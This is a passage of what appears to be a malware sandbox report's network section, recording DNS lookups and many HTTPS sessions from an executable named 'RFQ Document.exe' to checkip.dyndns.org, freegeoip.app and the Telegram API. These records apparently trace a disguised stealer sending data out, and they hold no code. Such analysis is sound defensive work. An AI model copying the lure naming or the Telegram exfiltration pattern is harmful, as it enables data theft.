Sep 28, 2021 08:00:07.386214018 CEST	443	50179	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:07.389367104 CEST	50179	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:07.389396906 CEST	443	50179	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:07.390316963 CEST	50179	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:07.390331984 CEST	443	50179	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:07.516504049 CEST	443	50179	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:07.516587019 CEST	443	50179	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:07.516855001 CEST	50179	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:07.517889023 CEST	50180	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:07.517940044 CEST	443	50180	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:07.518059969 CEST	50180	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:07.518328905 CEST	50180	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:07.518345118 CEST	443	50180	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:07.518848896 CEST	50179	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:07.581747055 CEST	443	50180	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:07.583986044 CEST	50180	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:07.584026098 CEST	443	50180	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:07.584208965 CEST	50180	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:07.584218979 CEST	443	50180	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:07.764993906 CEST	443	50180	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:07.765057087 CEST	443	50180	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:07.765367031 CEST	50180	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:07.766438007 CEST	50180	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:07.767793894 CEST	50181	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:07.767851114 CEST	443	50181	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:07.768785954 CEST	50181	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:07.775239944 CEST	50181	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:07.775271893 CEST	443	50181	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:07.885338068 CEST	443	50181	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:07.889904976 CEST	50181	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:07.889930010 CEST	443	50181	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:07.890619993 CEST	50181	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:07.890636921 CEST	443	50181	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:08.000315905 CEST	443	50181	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:08.001888037 CEST	443	50181	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:08.010436058 CEST	50182	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:08.010727882 CEST	443	50182	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:08.011368036 CEST	50182	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:08.011403084 CEST	50182	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:08.011411905 CEST	443	50182	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:08.011466980 CEST	50181	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:08.011488914 CEST	50181	443	192.168.2.4	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 28, 2021 07:57:49.904905081 CEST	57458	53	192.168.2.4	8.8.8.8
Sep 28, 2021 07:57:49.931982040 CEST	53	57458	8.8.8.8	192.168.2.4
Sep 28, 2021 07:57:49.985832930 CEST	50579	53	192.168.2.4	8.8.8.8
Sep 28, 2021 07:57:50.002543926 CEST	53	50579	8.8.8.8	192.168.2.4
Sep 28, 2021 07:57:50.034183979 CEST	51703	53	192.168.2.4	8.8.8.8
Sep 28, 2021 07:57:50.056436062 CEST	53	51703	8.8.8.8	192.168.2.4
Sep 28, 2021 07:57:50.175209045 CEST	65248	53	192.168.2.4	8.8.8.8
Sep 28, 2021 07:57:50.195456982 CEST	53	65248	8.8.8.8	192.168.2.4
Sep 28, 2021 07:57:50.407475948 CEST	53723	53	192.168.2.4	8.8.8.8
Sep 28, 2021 07:57:50.426398993 CEST	53	53723	8.8.8.8	192.168.2.4
Sep 28, 2021 07:57:52.086497068 CEST	64646	53	192.168.2.4	8.8.8.8
Sep 28, 2021 07:57:52.121588945 CEST	53	64646	8.8.8.8	192.168.2.4
Sep 28, 2021 07:57:57.747876883 CEST	65298	53	192.168.2.4	8.8.8.8
Sep 28, 2021 07:57:57.775429964 CEST	53	65298	8.8.8.8	192.168.2.4
Sep 28, 2021 07:58:04.842756987 CEST	59123	53	192.168.2.4	8.8.8.8
Sep 28, 2021 07:58:04.861382961 CEST	53	59123	8.8.8.8	192.168.2.4
Sep 28, 2021 07:58:04.877244949 CEST	54531	53	192.168.2.4	8.8.8.8
Sep 28, 2021 07:58:04.894201994 CEST	53	54531	8.8.8.8	192.168.2.4
Sep 28, 2021 07:58:06.725596905 CEST	49714	53	192.168.2.4	8.8.8.8
Sep 28, 2021 07:58:06.747652054 CEST	53	49714	8.8.8.8	192.168.2.4
Sep 28, 2021 07:58:09.587006092 CEST	58028	53	192.168.2.4	8.8.8.8
Sep 28, 2021 07:58:09.605787039 CEST	53	58028	8.8.8.8	192.168.2.4
Sep 28, 2021 07:58:27.446319103 CEST	53097	53	192.168.2.4	8.8.8.8
Sep 28, 2021 07:58:27.478327036 CEST	53	53097	8.8.8.8	192.168.2.4
Sep 28, 2021 07:58:45.119631052 CEST	49257	53	192.168.2.4	8.8.8.8
Sep 28, 2021 07:58:45.140292883 CEST	53	49257	8.8.8.8	192.168.2.4
Sep 28, 2021 07:58:48.356383085 CEST	62389	53	192.168.2.4	8.8.8.8
Sep 28, 2021 07:58:48.390084028 CEST	53	62389	8.8.8.8	192.168.2.4
Sep 28, 2021 07:58:48.893975019 CEST	49910	53	192.168.2.4	8.8.8.8
Sep 28, 2021 07:58:48.946300030 CEST	53	49910	8.8.8.8	192.168.2.4
Sep 28, 2021 07:58:49.473862886 CEST	55854	53	192.168.2.4	8.8.8.8
Sep 28, 2021 07:58:49.493026972 CEST	53	55854	8.8.8.8	192.168.2.4
Sep 28, 2021 07:58:49.798865080 CEST	64549	53	192.168.2.4	8.8.8.8
Sep 28, 2021 07:58:49.826356888 CEST	53	64549	8.8.8.8	192.168.2.4
Sep 28, 2021 07:58:49.861587048 CEST	63153	53	192.168.2.4	8.8.8.8
Sep 28, 2021 07:58:49.880759954 CEST	53	63153	8.8.8.8	192.168.2.4
Sep 28, 2021 07:58:50.359217882 CEST	52991	53	192.168.2.4	8.8.8.8
Sep 28, 2021 07:58:50.384278059 CEST	53	52991	8.8.8.8	192.168.2.4
Sep 28, 2021 07:58:50.817967892 CEST	53700	53	192.168.2.4	8.8.8.8
Sep 28, 2021 07:58:50.849745989 CEST	53	53700	8.8.8.8	192.168.2.4
Sep 28, 2021 07:58:51.399735928 CEST	51726	53	192.168.2.4	8.8.8.8
Sep 28, 2021 07:58:51.422228098 CEST	53	51726	8.8.8.8	192.168.2.4
Sep 28, 2021 07:58:52.125528097 CEST	56794	53	192.168.2.4	8.8.8.8
Sep 28, 2021 07:58:52.145600080 CEST	53	56794	8.8.8.8	192.168.2.4
Sep 28, 2021 07:58:53.423222065 CEST	56534	53	192.168.2.4	8.8.8.8
Sep 28, 2021 07:58:53.442584038 CEST	53	56534	8.8.8.8	192.168.2.4
Sep 28, 2021 07:58:53.938031912 CEST	56627	53	192.168.2.4	8.8.8.8
Sep 28, 2021 07:58:53.955471992 CEST	53	56627	8.8.8.8	192.168.2.4
Sep 28, 2021 07:59:02.302161932 CEST	56621	53	192.168.2.4	8.8.8.8
Sep 28, 2021 07:59:02.329798937 CEST	53	56621	8.8.8.8	192.168.2.4
Sep 28, 2021 07:59:02.414984941 CEST	63116	53	192.168.2.4	8.8.8.8
Sep 28, 2021 07:59:02.449933052 CEST	53	63116	8.8.8.8	192.168.2.4
Sep 28, 2021 07:59:09.014121056 CEST	64078	53	192.168.2.4	8.8.8.8
Sep 28, 2021 07:59:09.037537098 CEST	53	64078	8.8.8.8	192.168.2.4
Sep 28, 2021 07:59:37.151129007 CEST	64801	53	192.168.2.4	8.8.8.8
Sep 28, 2021 07:59:37.179333925 CEST	53	64801	8.8.8.8	192.168.2.4
Sep 28, 2021 07:59:37.944013119 CEST	61721	53	192.168.2.4	8.8.8.8
Sep 28, 2021 07:59:37.971066952 CEST	53	61721	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Sep 28, 2021 07:57:50.034183979 CEST	192.168.2.4	8.8.8.8	0x7312	Standard query (0)	clientconfig.passport.net	A (IP address)	IN (0x0001)
Sep 28, 2021 07:58:04.842756987 CEST	192.168.2.4	8.8.8.8	0xc16a	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)
Sep 28, 2021 07:58:04.877244949 CEST	192.168.2.4	8.8.8.8	0xbd0c	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)
Sep 28, 2021 07:58:06.725596905 CEST	192.168.2.4	8.8.8.8	0x87d7	Standard query (0)	freegeoip.app	A (IP address)	IN (0x0001)
Sep 28, 2021 07:58:09.587006092 CEST	192.168.2.4	8.8.8.8	0x505f	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Sep 28, 2021 07:57:50.056436062 CEST	8.8.8.8	192.168.2.4	0x7312	No error (0)	clientconfig.passport.net	authgfx.msa.akadns6.net		CNAME (Canonical name)	IN (0x0001)
Sep 28, 2021 07:58:04.861382961 CEST	8.8.8.8	192.168.2.4	0xc16a	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)
Sep 28, 2021 07:58:04.861382961 CEST	8.8.8.8	192.168.2.4	0xc16a	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)
Sep 28, 2021 07:58:04.861382961 CEST	8.8.8.8	192.168.2.4	0xc16a	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)
Sep 28, 2021 07:58:04.861382961 CEST	8.8.8.8	192.168.2.4	0xc16a	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)
Sep 28, 2021 07:58:04.861382961 CEST	8.8.8.8	192.168.2.4	0xc16a	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)
Sep 28, 2021 07:58:04.861382961 CEST	8.8.8.8	192.168.2.4	0xc16a	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)
Sep 28, 2021 07:58:04.861382961 CEST	8.8.8.8	192.168.2.4	0xc16a	No error (0)	checkip.dyndns.com		216.146.43.70	A (IP address)	IN (0x0001)
Sep 28, 2021 07:58:04.861382961 CEST	8.8.8.8	192.168.2.4	0xc16a	No error (0)	checkip.dyndns.com		216.146.43.71	A (IP address)	IN (0x0001)
Sep 28, 2021 07:58:04.894201994 CEST	8.8.8.8	192.168.2.4	0xbd0c	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)
Sep 28, 2021 07:58:04.894201994 CEST	8.8.8.8	192.168.2.4	0xbd0c	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)
Sep 28, 2021 07:58:04.894201994 CEST	8.8.8.8	192.168.2.4	0xbd0c	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)
Sep 28, 2021 07:58:04.894201994 CEST	8.8.8.8	192.168.2.4	0xbd0c	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)
Sep 28, 2021 07:58:04.894201994 CEST	8.8.8.8	192.168.2.4	0xbd0c	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)
Sep 28, 2021 07:58:04.894201994 CEST	8.8.8.8	192.168.2.4	0xbd0c	No error (0)	checkip.dyndns.com		216.146.43.71	A (IP address)	IN (0x0001)
Sep 28, 2021 07:58:04.894201994 CEST	8.8.8.8	192.168.2.4	0xbd0c	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)
Sep 28, 2021 07:58:04.894201994 CEST	8.8.8.8	192.168.2.4	0xbd0c	No error (0)	checkip.dyndns.com		216.146.43.70	A (IP address)	IN (0x0001)
Sep 28, 2021 07:58:06.747652054 CEST	8.8.8.8	192.168.2.4	0x87d7	No error (0)	freegeoip.app		172.67.188.154	A (IP address)	IN (0x0001)
Sep 28, 2021 07:58:06.747652054 CEST	8.8.8.8	192.168.2.4	0x87d7	No error (0)	freegeoip.app		104.21.19.200	A (IP address)	IN (0x0001)
Sep 28, 2021 07:58:09.605787039 CEST	8.8.8.8	192.168.2.4	0x505f	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

freegeoip.app

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49774	172.67.188.154	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49775	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.4	49784	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
100	192.168.2.4	49876	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
101	192.168.2.4	49877	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
102	192.168.2.4	49878	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
103	192.168.2.4	49879	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
104	192.168.2.4	49880	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
105	192.168.2.4	49881	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
106	192.168.2.4	49882	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
107	192.168.2.4	49883	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
108	192.168.2.4	49884	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
109	192.168.2.4	49885	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.4	49785	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
110	192.168.2.4	49886	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
111	192.168.2.4	49887	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
112	192.168.2.4	49888	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
113	192.168.2.4	49910	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
114	192.168.2.4	49913	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
115	192.168.2.4	49914	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
116	192.168.2.4	49915	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
117	192.168.2.4	49916	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
118	192.168.2.4	49917	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
119	192.168.2.4	49918	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.4	49786	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
120	192.168.2.4	49919	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
121	192.168.2.4	49920	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
122	192.168.2.4	49921	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
123	192.168.2.4	49922	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
124	192.168.2.4	49923	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
125	192.168.2.4	49924	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
126	192.168.2.4	49925	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
127	192.168.2.4	49926	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
128	192.168.2.4	49927	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
129	192.168.2.4	49928	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.4	49787	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
130	192.168.2.4	49929	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
131	192.168.2.4	49930	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
132	192.168.2.4	49931	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
133	192.168.2.4	49932	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
134	192.168.2.4	49933	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
135	192.168.2.4	49934	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
136	192.168.2.4	49935	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
137	192.168.2.4	49936	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
138	192.168.2.4	49937	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
139	192.168.2.4	49938	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.4	49788	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
140	192.168.2.4	49939	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
141	192.168.2.4	49940	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
142	192.168.2.4	49941	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
143	192.168.2.4	49942	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
144	192.168.2.4	49943	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
145	192.168.2.4	49944	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
146	192.168.2.4	49948	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
147	192.168.2.4	49950	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
148	192.168.2.4	49951	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
149	192.168.2.4	49953	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.4	49789	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
150	192.168.2.4	49956	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
151	192.168.2.4	49958	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
152	192.168.2.4	49960	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
153	192.168.2.4	49962	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
154	192.168.2.4	49964	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
155	192.168.2.4	49965	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
156	192.168.2.4	49967	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
157	192.168.2.4	49968	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
158	192.168.2.4	49970	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
159	192.168.2.4	49972	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.4	49790	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
160	192.168.2.4	49974	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
161	192.168.2.4	49975	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
162	192.168.2.4	49977	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
163	192.168.2.4	49978	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
164	192.168.2.4	49979	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
165	192.168.2.4	49980	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
166	192.168.2.4	49981	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
167	192.168.2.4	49982	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
168	192.168.2.4	49983	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
169	192.168.2.4	49984	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.4	49791	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
170	192.168.2.4	49988	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
171	192.168.2.4	49991	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
172	192.168.2.4	49992	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
173	192.168.2.4	49993	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

